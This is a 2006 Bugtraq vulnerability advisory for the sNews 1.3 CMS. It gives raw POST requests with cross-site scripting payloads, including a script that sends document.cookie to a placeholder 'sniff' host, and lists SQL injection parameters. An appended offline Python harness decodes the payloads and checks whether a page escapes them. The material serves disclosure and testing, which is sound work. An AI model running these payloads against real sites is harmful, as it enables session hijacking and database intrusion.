Open Source and information security mailing list archives
Message-ID: <20060705145841.9679.qmail@securityfocus.com>
Date: 5 Jul 2006 14:58:41 -0000
From: securityconnection@...il.com
To: bugtraq@...urityfocus.com
Subject: sNews 1.3 XSS SQL

sNews 1.3
http://snews.solucija.com

--------------------------
Cross Site Scripting (XSS)
--------------------------

POST http://target.xx:80/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 88

pojam=<script>alert(/EllipsisSecurityTest/)</script>&search=search

---

POST http://target.xx:80/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 130

text=1&name=1&id="><script>alert(/EllipsisSecurityTest/)</script>&commentspage=1&comment=test

---

POST http://target.xx/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 130

pojam=&text=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Ftarget.xx%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E&name=Ellipsis+Test&id=1&commentspage=1&comment=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C

<script>img = new Image(); img.src = "http://sniff.xx/s.gif?"+document.cookie;</script>

-------------
SQL injection
-------------

http://target.xx/index.php?id='[SQL]
http://target.xx/index.php?category='[SQL]
http://target.xx/index.php?PHPSESSID=&id=[SQL]
http://target.xx/index.php?id=1'[SQL]&commentspage=1

-----------------
Ellipsis Security
http://www.ellsec.org
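As an added example that is not part of the Bugtraq post above and not code from the sNews project: a small offline Python harness that keeps the post's three XSS form bodies as data, URL-decodes them (the third body is shown in the post only in its encoded form, followed by the decoded script), rebuilds the raw HTTP/1.0 POST with a Content-Length computed from the actual body, and classifies a captured response as reflecting the test marker unescaped, HTML-escaped, or not at all. The hosts target.xx and sniff.xx are the post's own placeholders; the two sample pages the checker runs over are constructed here to imitate a search form that echoes the `pojam` term, and are not real sNews output.

```python
# Added example, not from the original advisory: an offline harness that
# holds the three sNews 1.3 XSS requests from the post as data, decodes
# their form bodies, rebuilds a raw HTTP/1.0 request with a Content-Length
# derived from the actual body, and classifies whether a response reflects
# the test marker unescaped. target.xx / sniff.xx are the advisory's
# placeholder hosts; the sample responses below are constructed here.
import html
from urllib.parse import parse_qs

MARKER = "<script>alert(/EllipsisSecurityTest/)</script>"

# Form bodies exactly as they appear in the advisory.
SEARCH_BODY = "pojam=" + MARKER + "&search=search"
COMMENT_ID_BODY = 'text=1&name=1&id=">' + MARKER + "&commentspage=1&comment=test"
COMMENT_TEXT_BODY = (
    "pojam=&text=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A"
    "%2F%2Ftarget.xx%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E"
    "&name=Ellipsis+Test&id=1&commentspage=1"
    "&comment=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C"
)


def decode_form(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into a flat dict.
    keep_blank_values keeps the empty 'pojam=' field the third request sends."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def injected_fields(body: str) -> list:
    """Names of the form fields whose decoded value carries a <script> tag."""
    return [k for k, v in decode_form(body).items() if "<script>" in v.lower()]


def build_request(host: str, path: str, body: str) -> bytes:
    """Rebuild the raw HTTP/1.0 POST shown in the advisory, with Content-Length
    computed from the encoded body rather than typed by hand."""
    data = body.encode("utf-8")
    head = (
        f"POST {path} HTTP/1.0\r\n"
        "Accept: */*\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(data)}\r\n\r\n"
    )
    return head.encode("ascii") + data


def content_length(raw: bytes) -> int:
    """Read the Content-Length header back out of a raw request."""
    for line in raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1])
    raise ValueError("no Content-Length header")


def classify_reflection(response_html: str, payload: str = MARKER) -> str:
    """'unescaped' if the payload is echoed verbatim (exploitable), 'escaped'
    if only its entity-encoded form appears, otherwise 'absent'."""
    if payload in response_html:
        return "unescaped"
    if html.escape(payload, quote=True) in response_html:
        return "escaped"
    return "absent"


# Constructed sample responses: a search form that echoes the 'pojam' term
# into a value attribute, once raw and once as htmlspecialchars() would emit it.
VULNERABLE_PAGE = (
    '<form action="index.php" method="post">'
    '<input type="text" name="pojam" value="' + MARKER + '">'
    '<input type="submit" name="search" value="search"></form>'
)
FIXED_PAGE = VULNERABLE_PAGE.replace(MARKER, html.escape(MARKER, quote=True))

if __name__ == "__main__":
    for name, body in (("search", SEARCH_BODY), ("comment id", COMMENT_ID_BODY),
                       ("comment text", COMMENT_TEXT_BODY)):
        print(f"{name}: script tag in field(s) {injected_fields(body)}")
    print(build_request("target.xx", "/index.php", SEARCH_BODY).decode())
    print("vulnerable page:", classify_reflection(VULNERABLE_PAGE))
    print("fixed page:", classify_reflection(FIXED_PAGE))
```

Recomputing Content-Length matters when replaying these requests: none of the three values in the post match the length of the body shown under it, and a server that trusts a wrong header either reads a truncated body or waits for bytes that never arrive. The checker deliberately distinguishes "escaped" from "absent" so that a fix that drops the term entirely and one that encodes it are reported differently.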